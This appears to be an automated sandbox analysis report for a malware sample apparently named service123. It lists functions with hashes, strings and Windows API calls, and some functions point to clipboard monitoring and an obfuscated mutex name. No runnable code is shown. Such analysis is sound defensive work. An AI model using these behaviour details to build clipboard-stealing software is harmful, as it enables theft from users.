Instruction Fuzzy Hash: BC415CB0A04B819FDB10EFA6E8C035DB7F0BB48340F14452DE9899B751D7719985CF91

Function 001E1160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 001E11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 001E1238
__p__acmdln.MSVCRT ref: 001E1261
malloc.MSVCRT ref: 001E12EB
strlen.MSVCRT ref: 001E1323
malloc.MSVCRT ref: 001E132E
memcpy.MSVCRT ref: 001E1344
GetStartupInfoA.KERNEL32 ref: 001E1433

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: d5090dad7bd250fe3d49651780dd6075c83fc519e714a81a9e769982f628be46
Instruction ID: 123a9f107fdb65483ba31305baaa1f0e5e28e0d378f2e0bc5f41203d603a7785
Opcode Fuzzy Hash: d5090dad7bd250fe3d49651780dd6075c83fc519e714a81a9e769982f628be46
Instruction Fuzzy Hash: F1515BB1A04B819FDB10EFAAE8C075EBBF0FB48300F19452CE9459B751D771A986CB91

Function 6C834230 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexA.KERNEL32 ref: 6C834259
CreateMutexA.KERNELBASE ref: 6C8342A3
Sleep.KERNELBASE ref: 6C8342BF
GetClipboardSequenceNumber.USER32 ref: 6C8342C8

Strings

quJYrdQFgygDuzOLcwxa, xrefs: 6C834242, 6C83428C

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: Mutex$ClipboardCreateNumberOpenSequenceSleep
String ID: quJYrdQFgygDuzOLcwxa
API String ID: 3689039344-1414460728
Opcode ID: 845bd5fc1473298db6422ea8999d8eae01f25c9766fbbc138229f68e26d2509c
Instruction ID: 8732275a801b1d340aa7c980dd5fa1ef6c4f7232c8ee707a048885a3b559db5c
Opcode Fuzzy Hash: 845bd5fc1473298db6422ea8999d8eae01f25c9766fbbc138229f68e26d2509c
Instruction Fuzzy Hash: 2C01D67150A3058FCB20EFA8C64975BBFF4AB86348F01982CE89993650E7749448CBE2

Function 001E1296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 001E12EB
strlen.MSVCRT ref: 001E1323
malloc.MSVCRT ref: 001E132E
memcpy.MSVCRT ref: 001E1344

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 8394a5c2838bf92e81ab6897ec7974046431efc1ee8a2e994f15e2797ca5f85d
Instruction ID: f59dbda120d9076e75199b7469f242a90f93976969e6f1bb99431f4638979244
Opcode Fuzzy Hash: 8394a5c2838bf92e81ab6897ec7974046431efc1ee8a2e994f15e2797ca5f85d
Instruction Fuzzy Hash: A43135B5904B958FCB10DFA5E88035DBBF1BB48300F19892DE949AB711D731A986CF81

Function 001E13BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 001E12EB
strlen.MSVCRT ref: 001E1323
malloc.MSVCRT ref: 001E132E
memcpy.MSVCRT ref: 001E1344

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 1a72e64cc370094f6d6988873ba3485afbb9c229699e11110f2fb0f8f7b7f815
Instruction ID: 99afeca5b392491b11e94b804200f504b05d39b7ba39535f8ed69028a8ce51cf
Opcode Fuzzy Hash: 1a72e64cc370094f6d6988873ba3485afbb9c229699e11110f2fb0f8f7b7f815
Instruction Fuzzy Hash: 0C21F3B5D05B91CFCB14EFA5E88065DB7F1BB88300F15892DE948AB711D731A986CF81

Function 6C77B1A0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b5d6c9d14419de0b4ce869ddbf186011657c91e4a03efe634d530df77d678f5
Instruction ID: bb7e06e15586da0f46a0ae577130b269f2d3e9fd98d3bd0d3797e6c7f0b37b92
Opcode Fuzzy Hash: 6b5d6c9d14419de0b4ce869ddbf186011657c91e4a03efe634d530df77d678f5
Instruction Fuzzy Hash: 14517175A1530ACFCB20DF99D68451ABBF0FF85308B55A96AD8588BB10E730E454CBE2

Function 6C77B310 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0b9f2f334da46ecf37a1f6a4463a567e7cf4a6457cc41c8979c7cca0b732ba9
Instruction ID: 89ff7669086c210abef453def07f7ecaab084894018041c9af06cbacb0858e41
Opcode Fuzzy Hash: f0b9f2f334da46ecf37a1f6a4463a567e7cf4a6457cc41c8979c7cca0b732ba9
Instruction Fuzzy Hash: E031B2717113048BDF309FB9C6C425A7BA4FB4630CB486A79D9188BB55E734E444CBA2

Non-executed Functions

Function 6C76CD00 Relevance: 33.4, APIs: 22, Instructions: 445stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C76CD7D

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: e9233a85d8f5980ea83e9caf1ddb9ba2a590950c30be01c3c88353bba7cf1464
Instruction ID: c8f1a433459a8932d837c8c24c0945023676e915061a2c55112b88c37fca462e
Opcode Fuzzy Hash: e9233a85d8f5980ea83e9caf1ddb9ba2a590950c30be01c3c88353bba7cf1464
Instruction Fuzzy Hash: 300203715087518FDB00CF2AC144395FBE2AF86318F1986AEDCE85BF91C376A949CB85

Function 6C770FC0 Relevance: 22.6, APIs: 8, Strings: 4, Instructions: 1647stringCOMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C770FCA
strlen.MSVCRT ref: 6C770FD4

Strings

inity, xrefs: 6C771E21
5, xrefs: 6C7714D2
, xrefs: 6C77240F
!, xrefs: 6C772C08

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: localeconvstrlen
String ID: $!$5$inity
API String ID: 186660782-1328200385
Opcode ID: 94c9bf50ed19fb129ae605055a3823fd21619766b5f1b356c4e9e26fa138b075
Instruction ID: 7901cc919c1e55537198931b5cbd57e21b439c1f57845f3771ebb824d37115d1
Opcode Fuzzy Hash: 94c9bf50ed19fb129ae605055a3823fd21619766b5f1b356c4e9e26fa138b075
Instruction Fuzzy Hash: A0F24871A08389CFDB20CF29C69875ABBE0BF89348F11892DE9D997750D774D844CB62

Function 6C7E8280 Relevance: 17.7, Strings: 14, Instructions: 166COMMON

Download Yara Rule

Strings

rdrand, xrefs: 6C7E8358
hardware, xrefs: 6C7E8450
Auth, xrefs: 6C7E8426
rand_s, xrefs: 6C7E8467
Genu, xrefs: 6C7E838F
random_device::random_device(const std::string&): unsupported token, xrefs: 6C7E8482
default, xrefs: 6C7E829F
rdseed, xrefs: 6C7E82C8
Genu, xrefs: 6C7E841E
random_device::random_device(const std::string&): device not available, xrefs: 6C7E8348
Auth, xrefs: 6C7E82FF
rdrnd, xrefs: 6C7E83C8
Genu, xrefs: 6C7E8307
Auth, xrefs: 6C7E8397

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memcmpstrlen
String ID: Auth$Auth$Auth$Genu$Genu$Genu$default$hardware$rand_s$random_device::random_device(const std::string&): device not available$random_device::random_device(const std::string&): unsupported token$rdrand$rdrnd$rdseed
API String ID: 3108337309-1359127009
Opcode ID: 53e11234aa9225386806b085b69021d706f86bd4dc8d56d91cdb94df260c1d8d
Instruction ID: 0658bc41e37389bb77170c40e89b7759cd461b0f7a92fc560e3260b35d56c070
Opcode Fuzzy Hash: 53e11234aa9225386806b085b69021d706f86bd4dc8d56d91cdb94df260c1d8d
Instruction Fuzzy Hash: 844138B32193414BE310AA7CDB9531F76A6BB49318F648A3EC8819BF91E735D558C313

Function 6C76EE50 Relevance: 12.5, APIs: 8, Instructions: 494COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C76F18B
malloc.MSVCRT ref: 6C76F1A8

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 15644ddac5b78340ea4982afd6bdde0b748c13b81b62cb3a04cf5210d03a72ab
Instruction ID: 2c977059686e02c596429b25d0ea0cf509ca39943b8e4c7ed5d5b667b19f04c7
Opcode Fuzzy Hash: 15644ddac5b78340ea4982afd6bdde0b748c13b81b62cb3a04cf5210d03a72ab
Instruction Fuzzy Hash: 381270716097068FC710CF1AC68065AB7E2BF88358F558A2DEC9997F41E730ED09CB92

Function 6C78E490 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 219stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C78E4BA
strlen.MSVCRT ref: 6C78E52A

Strings

basic_string: construction from null is not valid, xrefs: 6C78E4F2, 6C78E562, 6C78E5D2
basic_string: construction from null is not valid, xrefs: 6C78E61F, 6C78E670, 6C78E6C0

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
API String ID: 39653677-1250104765
Opcode ID: 260dad7bb43b0cad7f7f5cf3b65ecebc5e3ad8ea88130f6e29d7809171b766aa
Instruction ID: b5f36b3344c9ca2453ac674009a18928b006bc6d1805e818a4e2549668095f0b
Opcode Fuzzy Hash: 260dad7bb43b0cad7f7f5cf3b65ecebc5e3ad8ea88130f6e29d7809171b766aa
Instruction Fuzzy Hash: BA6192F1A067148FCB10BF2CD58545AB7E0BF55218F06497DE9888B715E331E889CBD2

Function 6C780610 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C780636
memcmp.MSVCRT ref: 6C780659
memcmp.MSVCRT ref: 6C7806CF
memcmp.MSVCRT ref: 6C780741

Part of subcall function 6C82AB60: strlen.MSVCRT ref: 6C82AB6E

memcmp.MSVCRT ref: 6C7807D5

Strings

basic_string::compare, xrefs: 6C780678, 6C7806EC, 6C78075F, 6C7807F4, 6C780810
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C780680, 6C7806F4, 6C780767, 6C7807FC, 6C780818

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: abe5701b656ee916f8df39a58fc76a905c4c786a3aeeabffcd1c596e416fb928
Instruction ID: 38e2e94396a18d5ae9343c874fc36004e03561770635b913a213908f40b79fb9
Opcode Fuzzy Hash: abe5701b656ee916f8df39a58fc76a905c4c786a3aeeabffcd1c596e416fb928
Instruction Fuzzy Hash: B061797260A3149FC700AF69CA8445EFBE5BFD8B88F51893DE8C887720D231D844CB92

Function 6C779B99 Relevance: 10.6, APIs: 7, Instructions: 81clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 6C779BA0
GetClipboardData.USER32 ref: 6C779BE7
GlobalLock.KERNEL32 ref: 6C779BF9
GlobalUnlock.KERNEL32 ref: 6C779C1A
CloseClipboard.USER32 ref: 6C779C23

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockOpenUnlock
String ID:
API String ID: 1006321803-0
Opcode ID: dad844d2c1bbc362ae0a661829bbb4d613cd5f85b5bab883162e6ef8bbf125a4
Instruction ID: a36c9dcdb9c33fd2f014f5efb027c92e3af61f75e0e473bbae3101e29a923584
Opcode Fuzzy Hash: dad844d2c1bbc362ae0a661829bbb4d613cd5f85b5bab883162e6ef8bbf125a4
Instruction Fuzzy Hash: B12121B17062018FDB10BF7C964925E7AF0AB56318F444A78D89687A91EB34D448CB93

Function 6C7770C0 Relevance: 9.6, APIs: 6, Instructions: 649COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C7770C7
memset.MSVCRT ref: 6C777217

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: localeconvmemset
String ID:
API String ID: 2367598729-0
Opcode ID: 87386aadddc1c46f89622d31ce4a0757b326ba4a3e7f2c8131c52df9c77388e6
Instruction ID: 530a4b97149ddf1bd2cbb63872514877427b983f02a427f2161e7d7a6e6a6c0d
Opcode Fuzzy Hash: 87386aadddc1c46f89622d31ce4a0757b326ba4a3e7f2c8131c52df9c77388e6
Instruction Fuzzy Hash: 5142F4716093098FDB22CF29C68435ABBE2FFC5308F15892DE4948BB41D775D949CBA2

Function 6C775880 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 1506COMMON

Download Yara Rule

Strings

Infinity, xrefs: 6C775BE0
, xrefs: 6C777074
NaN, xrefs: 6C775B5F
, xrefs: 6C776D95

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID: $ $Infinity$NaN
API String ID: 0-3274152445
Opcode ID: 280f28760ccc5229225a3271fd3ff0c3d606da6eca2f20c674c63daa12fdeafe
Instruction ID: c63030685a47b36e0becee3115ce4604bb5beb933391976704989fa9406e7394
Opcode Fuzzy Hash: 280f28760ccc5229225a3271fd3ff0c3d606da6eca2f20c674c63daa12fdeafe
Instruction Fuzzy Hash: 57E233B1A093458FDB60CF29C28474ABBE0FF89748F10892EE89497754E775D944CFA2

Function 6C779BD7 Relevance: 6.0, APIs: 4, Instructions: 38clipboardCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32 ref: 6C779BE7
GlobalLock.KERNEL32 ref: 6C779BF9
GlobalUnlock.KERNEL32 ref: 6C779C1A
CloseClipboard.USER32 ref: 6C779C23
CloseClipboard.USER32 ref: 6C779C48
GetClipboardSequenceNumber.USER32 ref: 6C779C6E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: Clipboard$CloseGlobal$DataLockNumberSequenceUnlock
String ID:
API String ID: 1345600146-0
Opcode ID: e91ef4ed6dc149d1a3b3eb73f65a5f99d94c5536509952f3423b1e392a7c78b0
Instruction ID: b7b932a30f22b63eaaf3f1ba843a2eb629aff9149fc77ecde4e8eaffe850def3
Opcode Fuzzy Hash: e91ef4ed6dc149d1a3b3eb73f65a5f99d94c5536509952f3423b1e392a7c78b0
Instruction Fuzzy Hash: E5F081B270A2018FDF207F7CAA4816EBBF1AB52319F01093CD89693650EB349408CBD3

Function 001E51B0 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 001E66C5
, xrefs: 001E69A4

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 981b1255c0f0b53ef4b31059c1fae2eb91a06ba9915cce8e9cdcb1103428356b
Instruction ID: 3999e6cfd566784fdffe414aca7fbec7d51185e1495a8c2e9a015bca59d84dfa
Opcode Fuzzy Hash: 981b1255c0f0b53ef4b31059c1fae2eb91a06ba9915cce8e9cdcb1103428356b
Instruction Fuzzy Hash: 50E244B1A08B818FD724DF2AC58071EFBE1BF98788F55891DE88587351E775E8448F82

Function 001E3E20 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

gfff, xrefs: 001E3F2C
@, xrefs: 001E3FD9
., xrefs: 001E4114
gfff, xrefs: 001E3F43

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction ID: 7bb2d984d6c12290fea6b70a3cf01ed2609e9cf52f10e5e1a7e0dd123fcb71d6
Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction Fuzzy Hash: 23D1D571A08B868BDB14DF2AC88435FBBE2AFD4340F19C92DE8958B345D770DD498792

Function 6C7744F0 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

@, xrefs: 6C7746A9
gfff, xrefs: 6C7745FC
gfff, xrefs: 6C774613
., xrefs: 6C7747E4

Memory Dump Source

